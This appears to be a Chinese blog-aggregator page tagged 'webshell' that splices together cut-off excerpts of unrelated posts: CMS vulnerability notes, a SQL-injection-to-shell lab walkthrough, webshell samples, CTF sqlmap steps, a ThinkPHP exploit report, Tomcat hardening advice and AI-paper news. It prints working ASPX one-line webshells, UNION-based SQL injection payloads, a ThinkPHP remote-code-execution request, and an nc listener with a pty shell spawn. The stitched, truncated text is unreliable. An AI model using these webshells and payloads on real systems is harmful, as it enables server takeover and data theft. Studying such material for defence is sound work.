webshell

网站漏洞修复 被上传webshell漏洞修补

 ̄綄美尐妖づ 提交于 2019-11-30 15:56:18
近日,我们SINE安全在对某客户的网站进行网站漏洞检测与修复发现该网站存在严重的sql注入漏洞以及上传webshell网站木马文件漏洞,该网站使用的是某CMS系统,采用PHP语言开发,mysql数据库的架构,该网站源码目前是开源的状态。 某CMS是专注于提供付费知识的社交CMS系统,知识付费在目前的互联网中有这很高的需求,该系统可以对文档进行分享,收费下载,用户发布的知识内容可以隐藏,提供给付费客户阅读。代码比较精简深受广大站长们的喜欢,该网站漏洞主要发生在上传压缩包的同时,构造恶意解压代码讲zip包里的webshell解压到指定目录,导致漏洞发生。该CMS还存在sql注入漏洞,我们一一的来详细分解漏洞。 SQL注入漏洞详情与修复方案 对网站的代码数据库配置文件进行查看,看到数据库的连接函数使用的是pdo模式,再仔细的追踪代码查看到还使用了一些特殊符号的转义操作,有些sql注入代码并没有对齐进行全面的安全过滤,导致发生sql注入攻击,代码截图如下: 以上代码使用就是select查询功能,我们着重的来看下他的cond函数,通过对代码的详细查看确定这个函数是用来对接前端的用户写入的值,当前端用户提交恶意的代码的时候就会传入到id这个值当中,我们来拼接SQL语句,对id的值进行变量覆盖操作,可以配合IN,like等sql语句来进行攻击数据库,查看数据库的账号密码,以及修改数据库。

SQL注入联合文件上传控制目标主机

人走茶凉 提交于 2019-11-30 09:39:02
环境介绍 测试环境下载地址: https://pentesterlab.com/exercises/from_sqli_to_shell 2 复现过程 1.使用namp进行目标IP开放端口扫描 2.通过Nmap的主机端口发现,了解靶机对开放22、80端口,接下来我们对80端口进行访问,可以发现存在id=X的SQL注入风险点 3.通过SQL注入攻击,进行拖库 /cat.php?id=1 order by 5 /cat.php ?id=2 order by 4 通过执行POC,可知存在4列 /cat.php?id=-1 union select 1,database(),3,4 通过database()函数获取当前数据库为photoblog /cat.php?id=-1 union select 1,table_name,3,4 from information_schema.tableswhere table_schema="photoblog"通过已获取的库名结合information_schema .tables表,获取photoblog库下相应表名 /cat.php?id=-1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name="users

ashx后门[转]

江枫思渺然 提交于 2019-11-30 02:35:28
https://www.cnblogs.com/Fluorescence-tjy/p/9855828.html 一、标准ASPX一句话木马 .NET平台下的一句话木马则百年不变,最常见的当属下面这句 <%@ Page Language=”Jscript”%><%eval(Request.Item[“pass”],”unsafe”);%> 想必这句话已经成大多数防御产品的标准样本,除此以外还有上传文件的一句话,像这种的从严格意义上不能算是一句话木马,只是一个简单的上传文件的功能,实际的操作还是大马或者小马的操作行为。 <%if (Request.Files.Count!=0) { Request.Files[0].SaveAs(Server.MapPath(Request[“f”]) ); }%> 二、ASHX一句话木马 ashx马儿 https://github.com/tennc/webshell/blob/master/caidao-shell/customize.ashx 这个马儿已经实现了菜刀可连,可用,还是挺棒的,但因为体积过大,并且在服务端实现了大多数功能,其实更像是一个大马,只是对客户端的菜刀做了适配可用。 二、ASHX写文件木马 木马执行后会在当前目录下生成webshell.asp一句话木马,密码是pass 也可以写入其它文件。 <%@ WebHandler

网站漏洞渗透测试服务内容详情见解

怎甘沉沦 提交于 2019-11-29 23:49:20
小小白承包了一块20亩的土地,依山傍水,风水不错。听朋友说去年玉米大卖,他也想尝尝甜头,也就种上了玉米。 看着玉米茁壮成长,别提小小白心里多开心,心里盘算着玉米大买后,吃香喝辣的富贵生活。 好景不长,小小白这几天发现玉米长得慢了,还出现了黄叶,黄页面积还有扩大的趋势。着急的小小白找到大队的农业专家老周周,老周周说:“有病得治,玉米在生长期有着不同的阶段,不同阶段得有不同的护理措施,除了日常的除草、施肥,还得请专业的服务团队,定期给庄稼体检体检啊,发现问题,才能更好的解决问题,我知道城里有一家专门做这个业务的公司,用了都说好”,说完递给小小白一张名片。 小小白拨通了名片上的电话,接听电话的是这个Sinesafe公司安全服务团队的高级咨询师陈老师,一听小小白介绍种植的过程和出现的问题,就知道小小白是刚入门不久的小白,就开始给小小白耐心的讲解庄稼详情检测(网站渗透测试)的标准、基础知识。 渗透测试是一种通过模拟攻击者的攻击技术、方法,绕过系统安全措施,最终取得系统控制权的安全测试方式。 刚入安全门不久的小白同学,如果能在开始就养成规范的操作习惯,后续提升安全修为是百利而无一害的。 近些年,安全圈内的“牛”氏一族,结合多年丰富的牛逼经验,重新定义了渗透测试过程,即“渗透测试执行标准(PTES:Penetration Testing ExcutionStandard)”。

CTF-注入http报文

有些话、适合烂在心里 提交于 2019-11-29 16:06:21
1. 设置浏览器代理,拦截网页数据。 2. 复制拦截的raw代码,生成.raw文件 3. 使用sqlmap:   sqlmap -r request.raw -level 5 -risk 3 -dbs -dbms mysql --batch   sqlmap -r request.raw -level 5 -risk 3 -D "数据库名" -tables 查看对应数据库中的数据表   sqlmap -r request.raw -level 5 -risk 3 -D "数据库名" -T "表名" -columns 查看对应字段 --batch   sqlmap -r request.raw -level 5 -risk 3 -D "数据库名" -T "表名" -C "列名" -dump --batch 4. 网站后台寻找注入点   主题的404页面可以上传webshell   webshell 获取 /user/share/webshell/php/ 5. 执行shell 获取反弹shell   监听 nc -nlvp port   启动终端 python -c "import pty;pty.spawn('/bin/bash')" 6.提权 来源: https://www.cnblogs.com/Crux614/p/11521650.html

公司网站有漏洞被入侵该怎么解决

杀马特。学长 韩版系。学妹 提交于 2019-11-29 12:44:19
2019年1月14日消息,thinkphp又被爆出致命漏洞,可以直接远程代码执行,getshell提权写入网站木马到网站根目录,甚至直接提权到服务器,该漏洞影响版本ThinkPHP 5.0、ThinkPHP 5.0.10、ThinkPHP5.0.12、ThinkPHP5.0.13、ThinkPHP5.0.23、thinkphp 5.0.22版本。 攻击者可以伪造远程恶意代码,对服务器进行post提交数据来利用漏洞,该漏洞产生的原因是继上次2019元旦前后爆出的网站漏洞后,又一次的致命漏洞。在thinkphp目录下的library文件夹下的think\request.php代码。如下图所示: 从上述代码中可以看出整个代码写的流程,首先打开网站会从app.php代码里将请求的网站地址使用check来进行解析,然后再经过patch类型对其进行深度的赋值.然后可以使用post方式提交数据到_method函数当中去,框架会对进行判断,然后对其调用传入的参数值,经过整个代码的循坏以及传入,就可以导致request的值给覆盖掉,从而产生远程代码执行,我们来构造恶意的代码,看看漏洞是如何使用的。 post地址:anquan/public/index.php?s=captcha POST内容:c=system&f=whoami&_method=filter 直接远程提交过去就会执行我们的命令

网站安全检测 对帝国CMS代码的后台功能性安全测试

故事扮演 提交于 2019-11-29 08:14:34
最近我们SINE安全在对帝国CMS系统进行代码安全审计的时候,发现该系统存在网站漏洞,受影响的版本是EmpireCMS V7.5,从帝国官方网站下载到本地,我们人工对其代码进行详细的漏洞检测与安全代码分析。共计发现三个高危漏洞,都是在网站的后台管理页面上的功能发现的。该漏洞的产生,最根源的问题是没有对get,post提交方式进行严格的安全效验与过滤,导致可以插入恶意代码到后端服务器中去处理,导致漏洞的发生。 帝国CMS系统,简单给大家介绍一下,目前很多站长,以及企业建站,都在使用该套系统,快速,便捷,易于搜索引擎收录,采用的是B/S架构开发,php语言+Mysql数据库,支持大并发同时访问,可以承载较多的用户快速的访问网站的各个页面与内容,模板自定义化,可以设置标签与自行设计网站外观,静态html生成,还有采集功能,深受广大站长和网站运营者的喜欢。 我们SINE安全技术在对该代码进行安全检测与渗透测试的手,会先大体看下代码,熟悉整个网站的架构,数据库配置文件,以及入口调用到的文件,通常调用到的安全规则是如何写的,多个方面去大体的了解该代码,目前渗透测试中,发现的网站漏洞有:SQL注入漏洞,网站敏感信息泄露,初始化安装功能漏洞,直行平行越权逻辑漏洞,任意文件上传漏洞,登录绕过漏洞,短信验证码漏洞,找回密码漏洞,数据库备份webshell,XSS跨站,CSRF漏洞等待。

Tomcat安全加固配置

狂风中的少年 提交于 2019-11-29 07:22:58
Tomcat 服务默认启用了管理后台功能,使用该后台可直接上传 war 文件包对站点进行部署和管理。如果疏忽,可能导致管理后台存在空口令或者弱口令的漏洞,使得黑客或者不法分子可以利用该漏洞直接上传 Web shell 脚本 导致服务器沦陷。 通常 Tomcat 后台管理的 URL 地址为 http://iP:8080/manager/html/ 黑客通过猜解到的口令登录 Tomcat 管理后台后,可以上传 Web shell 脚本 导致服务器被入侵。 安全加固方案 由于此类型漏洞可能对业务系统造成比较严重的危害,建议您针对 Tomcat 管理后台进行以下安全加固配置。 1. 网络访问控制 如果您的业务不需要使用 Tomcat 管理后台管理业务代码,直接将 Tomcat 部署目录中 webapps 文件夹中的 manager、host-manager 文件夹全部删除,并注释 Tomcat 目录中 conf 文件夹中的 tomcat-users.xml 文件中的所有代码。 如果您的业务系统确实需要使用 Tomcat 管理后台进行业务代码的发布和管理,建议为 Tomcat 管理后台配置强口令,并修改默认 admin 用户,且密码长度不低于10位,必须包含大写字母、特殊符号、数字组合。 2. 开启 Tomcat 的访问日志 修改 conf/server.xml 文件,将下列代码取消注释:

阿里云安全研究成果入选人工智能顶级会议 IJCAI 2019, 业界首次用AI解决又一难题!

懵懂的女人 提交于 2019-11-29 06:25:15
8月10日至8月16日,国际人工智能组织联合会议IJCAI 2019(International Joint Conference on Artificial Intelligence 2019)在中国澳门召开。 阿里云4篇AI研究论文在诸多论文中脱颖而出,其中一篇被主论坛收录,三篇被AIBS Workshop 收录。 论文深入解析了AI技术在网络安全、数据安全和内容安全领域研究成果和场景化应用,展示了阿里云安全在智能安全领域的领导性。 自1969年首次在华盛顿特区举办以来,IJCAI已成为人工智能领域最重要的顶级学术会议之一。每年被IJCAI成功收录的论文均是AI领域最前沿的研究成果。今年IJCAI主论坛的论文收录率仅为17.9%,比去年收录率更低。阿里云被主论坛收录的论文《Locate Then Detect:Web Attack Detection via Attention-based Deep Neural Networks》, 首次解决了深度学习在Web攻击检测领域的结果可解释性问题,具有前所未有的创新意义 ,证明阿里云在安全AI技术的学术研究和应用方面业界领先。 《Locate Then Detect:Web Attack Detection via Attention-based Deep Neural Networks》(Tianlong Liu, Yu Qi,

阿里云安全研究成果入选人工智能顶级会议 IJCAI 2019, 业界首次用AI解决又一难题!

浪子不回头ぞ 提交于 2019-11-29 06:23:58
8月10日至8月16日,国际人工智能组织联合会议IJCAI 2019(International Joint Conference on Artificial Intelligence 2019)在中国澳门召开。 阿里云4篇AI研究论文在诸多论文中脱颖而出,其中一篇被主论坛收录,三篇被AIBS Workshop 收录。 论文深入解析了AI技术在网络安全、数据安全和内容安全领域研究成果和场景化应用,展示了阿里云安全在智能安全领域的领导性。 自1969年首次在华盛顿特区举办以来,IJCAI已成为人工智能领域最重要的顶级学术会议之一。每年被IJCAI成功收录的论文均是AI领域最前沿的研究成果。今年IJCAI主论坛的论文收录率仅为17.9%,比去年收录率更低。阿里云被主论坛收录的论文《Locate Then Detect:Web Attack Detection via Attention-based Deep Neural Networks》, 首次解决了深度学习在Web攻击检测领域的结果可解释性问题,具有前所未有的创新意义 ,证明阿里云在安全AI技术的学术研究和应用方面业界领先。 《Locate Then Detect:Web Attack Detection via Attention-based Deep Neural Networks》(Tianlong Liu, Yu Qi,